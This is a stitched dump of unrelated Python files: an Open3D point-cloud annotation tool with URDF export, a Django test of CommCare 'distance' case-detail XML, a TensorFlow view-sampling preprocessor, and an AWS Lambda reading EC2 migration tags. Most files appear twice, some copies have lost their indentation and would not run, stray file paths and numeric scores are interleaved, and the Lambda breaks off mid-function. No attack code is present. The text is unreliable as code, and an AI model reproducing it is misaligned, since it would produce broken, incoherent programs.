            self.align_transformation, self.view_param = self.axis_aligner.begin_annotation(self.view_param)
            # Persist the transform so a later session can restore it.
            self.axis_aligner.save_align_transformation(self.temp_path)
            self.demo_img_axis_align, self.view_param = self.axis_aligner.generate_demo_img(view_point=self.view_param)
        elif stage == "part segmentation":
            self.view_param = self.part_segmentator.begin_annotation(self.view_param, self.align_transformation)
            self.demo_img_part_segmentation, self.view_param = self.part_segmentator.generate_demo_img(view_point=self.view_param)
        elif stage == "joint annotation":
            self.joint_transformation, self.view_param = self.joint_annotator.begin_annotation(self.view_param)
            # Persist the transform so a later session can restore it.
            self.joint_annotator.save_joint_transformation(self.temp_path)
            self.demo_img_joint_annotation, self.view_param = self.joint_annotator.generate_demo_img(view_point=self.view_param)
    def generate_demo_img(self, view_point=None):
        """Render the current model off-screen; return (image, view_point).

        When *view_point* is None, the renderer's default camera is used
        and returned so that later stages can reuse it.
        """
        # NOTE(review): purpose of the near-zero-size coordinate frame is
        # unclear from here — presumably a placeholder axis marker.
        axis_pcd_temp = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.0001, origin=[0, 0, 0])
        vis_temp = o3d.visualization.Visualizer()
        vis_temp.create_window(visible=False)
        vis_temp.add_geometry(self.model_to_be_annotated)
        vis_temp.add_geometry(axis_pcd_temp)
        if view_point is None:
            view_point = vis_temp.get_view_control().convert_to_pinhole_camera_parameters()
        else:
            vis_temp.get_view_control().convert_from_pinhole_camera_parameters(view_point)
        vis_temp.poll_events()
        vis_temp.update_renderer()
        # do_render=True forces a render pass before capturing.
        demo_img = vis_temp.capture_screen_float_buffer(True)
        # vis_temp.run()
        vis_temp.destroy_window()
        return demo_img, view_point
    def play_animation(self):
        """Preview the annotated joint by animating child against parent."""
        self.animation_player.play_animation(self.animation_parent_mesh,
                                             self.animation_child_mesh,
                                             self.animation_joint_lower,
                                             self.animation_joint_upper,
                                             self.animation_joint_type,
                                             self.joint_transformation,
                                             self.view_param)
def saveann(self):
    """Save the current joint annotation and reference image name to joint.json.

    Writes the image name, the 4x4 joint transformation and the joint type
    into ``<model dir>/joint.json``.

    Fix: the original placed two triple-quoted strings *after* the first
    statement; those were dead no-op expression statements, not docstrings.
    They are hoisted into this real docstring.
    """
    # Rewrite the absolute model path relative to the working directory
    # (assumes the model path lives underneath os.getcwd() -- TODO confirm).
    save_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
    ann_dict = {}
    # NOTE(review): self.cimg and self.joint_type are not assigned anywhere in
    # this class as visible here -- confirm the UI layer sets them before
    # saveann() becomes reachable.
    ann_dict['image_name'] = self.cimg.split(os.getcwd().replace('\\', '/'))[1][1:]
    ann_dict['joint_transformation'] = self.joint_transformation.tolist()
    ann_dict['joint_type'] = self.joint_type
    with open(save_path + '/' + 'joint.json', 'w') as f_out:
        json.dump(ann_dict, f_out)
def record_joint_info(self, parent_file, child_file, lower, upper, joint_type):
    """Append a joint description (name/parent/child/limits/axis) exactly once.

    The joint axis is obtained by pushing the canonical z-axis segment through
    the annotated joint transformation and back through the inverse of the
    axis-align transformation.
    """
    parent_name = os.path.basename(parent_file.split(os.getcwd().replace('\\', '/'))[1][1:])
    child_name = os.path.basename(child_file.split(os.getcwd().replace('\\', '/'))[1][1:])
    joint_name = parent_name.split('.')[0] + '|' + joint_type + '|' + child_name.split('.')[0]
    # BUGFIX: the original condition was ``joint_name not in v`` where v is a
    # dict, which tests the dict *keys* ('name', 'parent', ...) and is
    # therefore always true -- duplicates were never filtered.  Compare the
    # recorded joint names instead.
    if all(info['name'] != joint_name for info in self.annotated_joint_infos):
        joint_info = {}
        joint_info['name'] = joint_name
        joint_info['parent'] = parent_name
        joint_info['child'] = child_name
        joint_info['lower'] = float(lower) if lower != '' else 0
        joint_info['upper'] = float(upper) if upper != '' else 0
        joint_info['type'] = joint_type
        start_point = np.array([0., 0., 0.])
        end_point = np.array([0., 0., 1.])
        line_points = np.stack([start_point, end_point])
        # Joint frame -> aligned frame -> original model frame.
        line_points = transform_coordinates_3d(line_points.T, self.joint_transformation).T
        line_points = transform_coordinates_3d(line_points.T, np.linalg.inv(self.align_transformation)).T
        joint_info['xyz'] = line_points[0].tolist()
        joint_info['rpy'] = (line_points[1] - line_points[0]).tolist()
        self.annotated_joint_infos.append(joint_info)
def save_urdf(self, save_file_path):
    """Export the annotated joints as a URDF next to the part meshes."""
    relative_path = save_file_path.split(os.getcwd().replace('\\', '/'))[1][1:]
    self.urdf_exporter.export_urdf(relative_path,
                                   joint_infos=self.annotated_joint_infos,
                                   part_path=os.path.join(self.model_to_be_annotated_path, 'part_meshes'))
import open3d as o3d
import numpy as np
import copy
import json
from math import *
from PyQt5.QtCore import *
from utils.util_func import transform_coordinates_3d, Scaling
from utils.axis_aligner import AxisAligner
from utils.part_segmentator import PartSegmentator
from utils.joint_annotator import JointAnnotator
from utils.animation import AnimationPlayer
from utils.urdf_exporter import URDFExporter
class Annotator():
"""Drive the three-stage annotation workflow (axis align, part
segmentation, joint annotation) over a scanned model and export URDF."""
def __init__(self,
annotation_material_path,
save_path=None):
# Path of the model currently being annotated (set later by the UI).
self.model_to_be_annotated_path = None
self.annotation_material_path = annotation_material_path
# Only .obj files in the material folder are offered as material choices.
self.annotation_material_list = [p for p in os.listdir(self.annotation_material_path) if p.endswith('.obj')]
self.save_path = save_path
self.temp_path = None
self.model_to_be_annotated = None
self.annotation_material = None
# Cached camera parameters so every stage reuses the same viewpoint.
self.view_param = None
# 4x4 transforms produced by the align / joint stages.
self.align_transformation = None
self.joint_transformation = None
# Per-stage preview images.
self.demo_img_axis_align = None
self.demo_img_part_segmentation = None
self.demo_img_joint_annotation = None
self.annotated_joint_infos = []
self.material_color = 'color1'
# Stage-specific helper objects.
self.axis_aligner = AxisAligner()
self.part_segmentator = PartSegmentator()
self.joint_annotator = JointAnnotator()
self.animation_player = AnimationPlayer()
self.urdf_exporter = URDFExporter()
self.current_ann_stage = "Axis Align"
def init_annotator(self):
"""Load the selected model, restore any transforms saved under temp_path,
and initialise the per-stage annotator helpers."""
self.current_material_index = 0
# Rewrite the absolute model path relative to os.getcwd()
# (assumes the model lives underneath the working directory -- TODO confirm).
self.model_to_be_annotated_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
self.model_to_be_annotated_name = self.model_to_be_annotated_path.split('/')[-1].split('_')[0] + '.ply'
self.model_to_be_annotated = o3d.io.read_point_cloud(os.path.join(self.model_to_be_annotated_path,
self.model_to_be_annotated_name))
self.demo_img_init, self.view_param = self.generate_demo_img()
# Restore a previously saved axis-align transform, if one exists.
self.init_align_transformation_path = os.path.join(self.temp_path, 'align_transformation.json')
if os.path.lexists(self.init_align_transformation_path):
f = json.load(open(self.init_align_transformation_path))
self.align_transformation = np.array(f['align_transformation'])
# self.model_to_be_annotated.transform(self.align_transformation)
# Restore a previously saved joint transform, if one exists.
self.init_joint_transformation_path = os.path.join(self.temp_path, 'joint_transformation.json')
if os.path.lexists(self.init_joint_transformation_path):
f = json.load(open(self.init_joint_transformation_path))
self.joint_transformation = np.array(f['joint_transformation'])
self.axis_aligner.init_annotator(self.model_to_be_annotated,
init_align_transformation=self.align_transformation)
self.part_segmentator.init_annotator(self.model_to_be_annotated,
part_mesh_save_path=self.model_to_be_annotated_path)
self.joint_annotator.init_annotator(self.model_to_be_annotated,
init_joint_transformation=self.joint_transformation)
# self.reset()
def update_model(self, id):
    """Switch to the material encoded in *id* (``"<objname>_<color>"``)
    and re-initialise every annotation stage."""
    obj_name, obj_color = id.split('_')
    self.material_color = obj_color
    self.current_material_index = self.annotation_material_list.index('%s.obj' % obj_name)
    self.reset()
def reset(self):
    """Reload the active material mesh and reset every stage annotator."""
    material_file = '%s/%s' % (self.annotation_material_path,
                               self.annotation_material_list[self.current_material_index])
    self.annotation_material = material_file
    self.axis_aligner.reset(material_file, self.model_to_be_annotated, self.material_color)
    self.part_segmentator.reset(self.model_to_be_annotated)
    self.joint_annotator.reset(self.model_to_be_annotated)
def set_animation_info(self, parent_file, child_file, lower, upper, joint_type):
    """Load the parent/child part meshes and remember the joint parameters
    consumed by play_animation()."""
    cwd = os.getcwd().replace('\\', '/')
    self.animation_parent_mesh = o3d.io.read_point_cloud(parent_file.split(cwd)[1][1:])
    self.animation_child_mesh = o3d.io.read_point_cloud(child_file.split(cwd)[1][1:])
    self.animation_joint_lower = lower
    self.animation_joint_upper = upper
    self.animation_joint_type = joint_type
def begin_annotation(self, stage):
"""Run one interactive annotation stage and refresh its preview image."""
if stage == "axis align":
self.align_transformation, self.view_param = self.axis_aligner.begin_annotation(self.view_param)
# Persist the align transform so a later session can resume from it.
self.axis_aligner.save_align_transformation(self.temp_path)
self.demo_img_axis_align, self.view_param = self.axis_aligner.generate_demo_img(view_point=self.view_param)
elif stage == "part segmentation":
self.view_param = self.part_segmentator.begin_annotation(self.view_param, self.align_transformation)
self.demo_img_part_segmentation, self.view_param = self.part_segmentator.generate_demo_img(view_point=self.view_param)
elif stage == "joint annotation":
self.joint_transformation, self.view_param = self.joint_annotator.begin_annotation(self.view_param)
self.joint_annotator.save_joint_transformation(self.temp_path)
self.demo_img_joint_annotation, self.view_param = self.joint_annotator.generate_demo_img(view_point=self.view_param)
def generate_demo_img(self, view_point=None):
"""Off-screen render; returns (float image buffer, pinhole camera params)."""
# Tiny coordinate frame added alongside the model geometry.
axis_pcd_temp = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.0001, origin=[0, 0, 0])
vis_temp = o3d.visualization.Visualizer()
vis_temp.create_window(visible=False)
vis_temp.add_geometry(self.model_to_be_annotated)
vis_temp.add_geometry(axis_pcd_temp)
if view_point is None:
# First render: capture the default camera so later calls can reuse it.
view_point = vis_temp.get_view_control().convert_to_pinhole_camera_parameters()
else:
vis_temp.get_view_control().convert_from_pinhole_camera_parameters(view_point)
vis_temp.poll_events()
vis_temp.update_renderer()
demo_img = vis_temp.capture_screen_float_buffer(True)
# vis_temp.run()
vis_temp.destroy_window()
return demo_img, view_point
def play_animation(self):
"""Animate the recorded parent/child meshes along the annotated joint."""
self.animation_player.play_animation(self.animation_parent_mesh,
self.animation_child_mesh,
self.animation_joint_lower,
self.animation_joint_upper,
self.animation_joint_type,
self.joint_transformation,
self.view_param)
def saveann(self):
    """Save the current joint annotation and reference image name to joint.json.

    Writes the image name, the 4x4 joint transformation and the joint type
    into ``<model dir>/joint.json``.

    Fix: the original placed two triple-quoted strings *after* the first
    statement; those were dead no-op expression statements, not docstrings.
    They are hoisted into this real docstring.
    """
    # Rewrite the absolute model path relative to the working directory
    # (assumes the model path lives underneath os.getcwd() -- TODO confirm).
    save_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
    ann_dict = {}
    # NOTE(review): self.cimg and self.joint_type are not assigned anywhere in
    # this class as visible here -- confirm the UI layer sets them before
    # saveann() becomes reachable.
    ann_dict['image_name'] = self.cimg.split(os.getcwd().replace('\\', '/'))[1][1:]
    ann_dict['joint_transformation'] = self.joint_transformation.tolist()
    ann_dict['joint_type'] = self.joint_type
    with open(save_path + '/' + 'joint.json', 'w') as f_out:
        json.dump(ann_dict, f_out)
def record_joint_info(self, parent_file, child_file, lower, upper, joint_type):
    """Append a joint description (name/parent/child/limits/axis) exactly once.

    The joint axis is obtained by pushing the canonical z-axis segment through
    the annotated joint transformation and back through the inverse of the
    axis-align transformation.
    """
    parent_name = os.path.basename(parent_file.split(os.getcwd().replace('\\', '/'))[1][1:])
    child_name = os.path.basename(child_file.split(os.getcwd().replace('\\', '/'))[1][1:])
    joint_name = parent_name.split('.')[0] + '|' + joint_type + '|' + child_name.split('.')[0]
    # BUGFIX: the original condition was ``joint_name not in v`` where v is a
    # dict, which tests the dict *keys* ('name', 'parent', ...) and is
    # therefore always true -- duplicates were never filtered.  Compare the
    # recorded joint names instead.
    if all(info['name'] != joint_name for info in self.annotated_joint_infos):
        joint_info = {}
        joint_info['name'] = joint_name
        joint_info['parent'] = parent_name
        joint_info['child'] = child_name
        joint_info['lower'] = float(lower) if lower != '' else 0
        joint_info['upper'] = float(upper) if upper != '' else 0
        joint_info['type'] = joint_type
        start_point = np.array([0., 0., 0.])
        end_point = np.array([0., 0., 1.])
        line_points = np.stack([start_point, end_point])
        # Joint frame -> aligned frame -> original model frame.
        line_points = transform_coordinates_3d(line_points.T, self.joint_transformation).T
        line_points = transform_coordinates_3d(line_points.T, np.linalg.inv(self.align_transformation)).T
        joint_info['xyz'] = line_points[0].tolist()
        joint_info['rpy'] = (line_points[1] - line_points[0]).tolist()
        self.annotated_joint_infos.append(joint_info)
def save_urdf(self, save_file_path):
    """Export the annotated joints as a URDF next to the part meshes."""
    relative_path = save_file_path.split(os.getcwd().replace('\\', '/'))[1][1:]
    self.urdf_exporter.export_urdf(relative_path,
                                   joint_infos=self.annotated_joint_infos,
                                   part_path=os.path.join(self.model_to_be_annotated_path, 'part_meshes'))
from django.test import SimpleTestCase
from corehq.apps.app_manager.models import SortElement
from corehq.apps.app_manager.tests.app_factory import AppFactory
from corehq.apps.app_manager.tests.util import TestXmlMixin
class CaseDetailDistance(SimpleTestCase, TestXmlMixin):
"""Suite-generation tests for the 'distance' case-detail column format."""
def setUp(self):
# One app with a single basic module; each test mutates its case details
# and regenerates the suite XML.
self.factory = AppFactory(build_version='2.26.0')
self.factory.new_basic_module('registration', 'patient registration')
module = self.factory.app.get_module(0)
self.case_details = module.case_details
# A 'distance'-formatted short-detail column renders a km-formatted template
# and gains an implicit ascending numeric sort (2147483647 sentinel for blanks).
def test_short_detail_xml(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
<sort direction="ascending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
# An explicit 'distance' SortElement keeps the plain column template and adds
# a descending numeric sort on the raw distance.
def test_short_detail_xml_with_sort(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short.sort_elements.append(
SortElement(
field=short_column.field,
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="case_name"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
# A sort-only distance element produces a hidden width-0 field that carries
# the descending distance sort, leaving the visible column untouched.
def test_short_detail_xml_sort_only(self):
short = self.case_details.short
short.display = 'short'
short.sort_elements.append(
SortElement(
field='gps',
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="case_name"/>
</text>
</template>
</field>
<field>
<header width="0">
<text/>
</header>
<template width="0">
<text>
<xpath function="gps"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(gps = '', 2147483647, round(distance(gps, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
# A 'distance' column in the long detail renders the km template but gets no
# sort element (long details are not sorted).
def test_long_detail_xml(self):
long_ = self.case_details.long
long_.display = 'long'
long_column = long_.get_column(0)
long_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_long"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_long.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
</field>
</partial>
""",
suite,
template_xpath
) | corehq/apps/app_manager/tests/test_case_detail_distance.py | from django.test import SimpleTestCase
from corehq.apps.app_manager.models import SortElement
from corehq.apps.app_manager.tests.app_factory import AppFactory
from corehq.apps.app_manager.tests.util import TestXmlMixin
class CaseDetailDistance(SimpleTestCase, TestXmlMixin):
"""Suite-generation tests for the 'distance' case-detail column format."""
def setUp(self):
# One app with a single basic module; each test mutates its case details
# and regenerates the suite XML.
self.factory = AppFactory(build_version='2.26.0')
self.factory.new_basic_module('registration', 'patient registration')
module = self.factory.app.get_module(0)
self.case_details = module.case_details
# A 'distance'-formatted short-detail column renders a km-formatted template
# and gains an implicit ascending numeric sort (2147483647 sentinel for blanks).
def test_short_detail_xml(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
<sort direction="ascending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
# An explicit 'distance' SortElement keeps the plain column template and adds
# a descending numeric sort on the raw distance.
def test_short_detail_xml_with_sort(self):
short = self.case_details.short
short.display = 'short'
short_column = short.get_column(0)
short.sort_elements.append(
SortElement(
field=short_column.field,
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="case_name"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(case_name = '', 2147483647, round(distance(case_name, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
# A sort-only distance element produces a hidden width-0 field that carries
# the descending distance sort, leaving the visible column untouched.
def test_short_detail_xml_sort_only(self):
short = self.case_details.short
short.display = 'short'
short.sort_elements.append(
SortElement(
field='gps',
type='distance',
direction='descending',
)
)
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_short"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_short.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="case_name"/>
</text>
</template>
</field>
<field>
<header width="0">
<text/>
</header>
<template width="0">
<text>
<xpath function="gps"/>
</text>
</template>
<sort direction="descending" order="1" type="double">
<text>
<xpath function="if(gps = '', 2147483647, round(distance(gps, here())))"/>
</text>
</sort>
</field>
</partial>
""",
suite,
template_xpath
)
# A 'distance' column in the long detail renders the km template but gets no
# sort element (long details are not sorted).
def test_long_detail_xml(self):
long_ = self.case_details.long
long_.display = 'long'
long_column = long_.get_column(0)
long_column.format = 'distance'
suite = self.factory.app.create_suite()
template_xpath = './detail[@id="m0_case_long"]/field'
self.assertXmlHasXpath(suite, template_xpath)
self.assertXmlPartialEqual(
"""
<partial>
<field>
<header>
<text>
<locale id="m0.case_long.case_name_1.header"/>
</text>
</header>
<template>
<text>
<xpath function="if(here() = '' or case_name = '', '', concat(round(distance(case_name, here()) div 100) div 10, ' km'))"/>
</text>
</template>
</field>
</partial>
""",
suite,
template_xpath
) | 0.470007 | 0.227931
import numpy as np
import tensorflow as tf
from util.camera import camera_from_blender, quaternion_from_campos
def pool_single_view(cfg, tensor, view_idx):
    """Gather the slice of `tensor` belonging to view `view_idx` of each batch item."""
    flat_ids = view_idx + cfg.step_size * tf.range(cfg.batch_size)
    return tf.gather_nd(tensor, tf.expand_dims(flat_ids, axis=-1))
class DataBase(object):
"""Base class holding the experiment config and the view-sampling helper."""
def __init__(self, cfg):
self._params = cfg
def cfg(self):
"""Return the stored config object."""
return self._params
def preprocess(self, raw_inputs, step_size, random_views=False):
"""Selects the subset of viewpoints to train on.

For every batch element this picks `step_size` view indices (sequential,
random, or limited by the per-sample view count when
cfg.variable_num_views is set) and gathers the matching images, masks and
camera data out of `raw_inputs`.
"""
cfg = self.cfg()
var_num_views = cfg.variable_num_views
num_views = raw_inputs['image'].get_shape().as_list()[1]
quantity = cfg.batch_size
if cfg.num_views_to_use == -1:
max_num_views = num_views
else:
max_num_views = cfg.num_views_to_use
inputs = dict()
# Host-side sampler run via tf.py_func: builds (batch_idx, view_idx) pairs
# plus a 0/1 mask marking which of the step_size slots hold a real view.
def batch_sampler(all_num_views):
out = np.zeros((0, 2), dtype=np.int64)
valid_samples = np.zeros((0), dtype=np.float32)
for n in range(quantity):
valid_samples_m = np.ones((step_size), dtype=np.float32)
if var_num_views:
num_actual_views = int(all_num_views[n, 0])
ids = np.random.choice(num_actual_views, min(step_size, num_actual_views), replace=False)
if num_actual_views < step_size:
# Pad with view 0 and mark the padded slots invalid.
to_fill = step_size - num_actual_views
ids = np.concatenate((ids, np.zeros((to_fill), dtype=ids.dtype)))
valid_samples_m[num_actual_views:] = 0.0
elif random_views:
ids = np.random.choice(max_num_views, step_size, replace=False)
else:
ids = np.arange(0, step_size).astype(np.int64)
ids = np.expand_dims(ids, axis=-1)
batch_ids = np.full((step_size, 1), n, dtype=np.int64)
full_ids = np.concatenate((batch_ids, ids), axis=-1)
out = np.concatenate((out, full_ids), axis=0)
valid_samples = np.concatenate((valid_samples, valid_samples_m), axis=0)
return out, valid_samples
num_actual_views = raw_inputs['num_views'] if var_num_views else tf.constant([0])
indices, valid_samples = tf.py_func(batch_sampler, [num_actual_views], [tf.int64, tf.float32])
indices = tf.reshape(indices, [step_size*quantity, 2])
inputs['valid_samples'] = tf.reshape(valid_samples, [step_size*quantity])
inputs['masks'] = tf.gather_nd(raw_inputs['mask'], indices)
inputs['masks_sdf'] = tf.gather_nd(raw_inputs['mask_sdf'], indices)
inputs['images'] = tf.gather_nd(raw_inputs['image'], indices)
if cfg.saved_depth:
inputs['depths'] = tf.gather_nd(raw_inputs['depth'], indices)
inputs['images_1'] = pool_single_view(cfg, inputs['images'], 0)
# Convert Blender-convention extrinsics to this project's camera convention.
def fix_matrix(extr):
out = np.zeros_like(extr)
num_matrices = extr.shape[0]
for k in range(num_matrices):
out[k, :, :] = camera_from_blender(extr[k, :, :])
return out
def quaternion_from_campos_wrapper(campos):
num = campos.shape[0]
out = np.zeros([num, 4], dtype=np.float32)
for k in range(num):
out[k, :] = quaternion_from_campos(campos[k, :])
return out
if cfg.saved_camera:
matrices = tf.gather_nd(raw_inputs['extrinsic'], indices)
orig_shape = matrices.shape
extr_tf = tf.py_func(fix_matrix, [matrices], tf.float32)
inputs['matrices'] = tf.reshape(extr_tf, shape=orig_shape)
cam_pos = tf.gather_nd(raw_inputs['cam_pos'], indices)
orig_shape = cam_pos.shape
quaternion = tf.py_func(quaternion_from_campos_wrapper, [cam_pos], tf.float32)
inputs['camera_quaternion'] = tf.reshape(quaternion, shape=[orig_shape[0], 4])
return inputs | drwr/data_base/data_base.py | import numpy as np
import tensorflow as tf
from util.camera import camera_from_blender, quaternion_from_campos
def pool_single_view(cfg, tensor, view_idx):
"""Pick view `view_idx` of every batch element from a (batch*step_size, ...) tensor."""
indices = tf.range(cfg.batch_size) * cfg.step_size + view_idx
indices = tf.expand_dims(indices, axis=-1)
return tf.gather_nd(tensor, indices)
class DataBase(object):
"""Base class holding the experiment config and the view-sampling helper."""
def __init__(self, cfg):
self._params = cfg
def cfg(self):
"""Return the stored config object."""
return self._params
def preprocess(self, raw_inputs, step_size, random_views=False):
"""Selects the subset of viewpoints to train on.

For every batch element this picks `step_size` view indices (sequential,
random, or limited by the per-sample view count when
cfg.variable_num_views is set) and gathers the matching images, masks and
camera data out of `raw_inputs`.
"""
cfg = self.cfg()
var_num_views = cfg.variable_num_views
num_views = raw_inputs['image'].get_shape().as_list()[1]
quantity = cfg.batch_size
if cfg.num_views_to_use == -1:
max_num_views = num_views
else:
max_num_views = cfg.num_views_to_use
inputs = dict()
# Host-side sampler run via tf.py_func: builds (batch_idx, view_idx) pairs
# plus a 0/1 mask marking which of the step_size slots hold a real view.
def batch_sampler(all_num_views):
out = np.zeros((0, 2), dtype=np.int64)
valid_samples = np.zeros((0), dtype=np.float32)
for n in range(quantity):
valid_samples_m = np.ones((step_size), dtype=np.float32)
if var_num_views:
num_actual_views = int(all_num_views[n, 0])
ids = np.random.choice(num_actual_views, min(step_size, num_actual_views), replace=False)
if num_actual_views < step_size:
# Pad with view 0 and mark the padded slots invalid.
to_fill = step_size - num_actual_views
ids = np.concatenate((ids, np.zeros((to_fill), dtype=ids.dtype)))
valid_samples_m[num_actual_views:] = 0.0
elif random_views:
ids = np.random.choice(max_num_views, step_size, replace=False)
else:
ids = np.arange(0, step_size).astype(np.int64)
ids = np.expand_dims(ids, axis=-1)
batch_ids = np.full((step_size, 1), n, dtype=np.int64)
full_ids = np.concatenate((batch_ids, ids), axis=-1)
out = np.concatenate((out, full_ids), axis=0)
valid_samples = np.concatenate((valid_samples, valid_samples_m), axis=0)
return out, valid_samples
num_actual_views = raw_inputs['num_views'] if var_num_views else tf.constant([0])
indices, valid_samples = tf.py_func(batch_sampler, [num_actual_views], [tf.int64, tf.float32])
indices = tf.reshape(indices, [step_size*quantity, 2])
inputs['valid_samples'] = tf.reshape(valid_samples, [step_size*quantity])
inputs['masks'] = tf.gather_nd(raw_inputs['mask'], indices)
inputs['masks_sdf'] = tf.gather_nd(raw_inputs['mask_sdf'], indices)
inputs['images'] = tf.gather_nd(raw_inputs['image'], indices)
if cfg.saved_depth:
inputs['depths'] = tf.gather_nd(raw_inputs['depth'], indices)
inputs['images_1'] = pool_single_view(cfg, inputs['images'], 0)
# Convert Blender-convention extrinsics to this project's camera convention.
def fix_matrix(extr):
out = np.zeros_like(extr)
num_matrices = extr.shape[0]
for k in range(num_matrices):
out[k, :, :] = camera_from_blender(extr[k, :, :])
return out
def quaternion_from_campos_wrapper(campos):
num = campos.shape[0]
out = np.zeros([num, 4], dtype=np.float32)
for k in range(num):
out[k, :] = quaternion_from_campos(campos[k, :])
return out
if cfg.saved_camera:
matrices = tf.gather_nd(raw_inputs['extrinsic'], indices)
orig_shape = matrices.shape
extr_tf = tf.py_func(fix_matrix, [matrices], tf.float32)
inputs['matrices'] = tf.reshape(extr_tf, shape=orig_shape)
cam_pos = tf.gather_nd(raw_inputs['cam_pos'], indices)
orig_shape = cam_pos.shape
quaternion = tf.py_func(quaternion_from_campos_wrapper, [cam_pos], tf.float32)
inputs['camera_quaternion'] = tf.reshape(quaternion, shape=[orig_shape[0], 4])
return inputs | 0.841956 | 0.323353
"""Find the passed in instance id and see if it is a CE migration"""
from __future__ import annotations
import json
import os
from typing import Any, Dict
import boto3
from migrationstate import MigrationStateHandler
print("Loading function find_instance")
# Module-level AWS clients: created once per Lambda container and reused
# across warm invocations.
ec2_resource = boto3.resource("ec2")
# NOTE(review): `sqs` is never used in this module -- confirm before removing.
sqs = boto3.client("sqs")
# {
# "version": "0",
# "id": "7e979767-95bb-1972-0cab-a670ec5d5000",
# "detail-type": "EC2 Instance State-change Notification",
# "source": "aws.ec2",
# "account": "460535642604",
# "time": "2019-08-23T13:45:28Z",
# "region": "us-east-1",
# "resources": [
# "arn:aws:ec2:us-east-1:460535642604:instance/i-00c758f34483a2ea2"
# ],
# "detail": {
# "instance-id": "i-00c758f34483a2ea2",
# "state": "running"
# }
# }
def lambda_handler(event: Dict[str, Any], context: Any) -> Dict[str, Any]:
    """Look up the EC2 instance named in *event* and collect its migration tags.

    Fix: the return annotation was ``-> str`` but the function always returns
    a dict.

    Returns a dict whose ``instance_id`` is the real id when the instance
    carries ``CloneStatus=NOT_STARTED``, ``"not-migration"`` when the
    migration already started, or ``"not-found"`` when the id is missing or
    cannot be resolved.  Destination account/KMS/role and the instance name
    are copied from the matching tags when present.
    """
    print("Received event: " + json.dumps(event, indent=2))
    detail: Dict[str, Any] = event.get("detail", {})
    event_dict: Dict[str, Any] = {}
    instance_id: str = detail.get("instance-id", "")
    if not instance_id:
        event_dict["instance_id"] = "not-found"
        return event_dict
    try:
        instance = ec2_resource.Instance(instance_id)
        # Look for tags that show it is a CE migration that has not run yet.
        for tag in instance.tags:
            if tag["Key"] == "CloneStatus":
                if tag["Value"] == "NOT_STARTED":
                    event_dict["instance_id"] = instance_id
                else:
                    event_dict["instance_id"] = "not-migration"
            if tag["Key"] == "DestinationAccount":
                event_dict["account"] = tag["Value"]
            if tag["Key"] == "DestinationKMS":
                event_dict["kms_id"] = tag["Value"]
            if tag["Key"] == "DestinationRole":
                event_dict["role"] = tag["Value"]
            if tag["Key"] == "Name":
                event_dict["name"] = tag["Value"]
    except Exception as e:  # boundary handler: degrade to "not-found"
        print(e)
        event_dict["instance_id"] = "not-found"
    # NOTE(review): machine_name may be None when the instance had no Name
    # tag -- confirm MigrationStateHandler tolerates that.
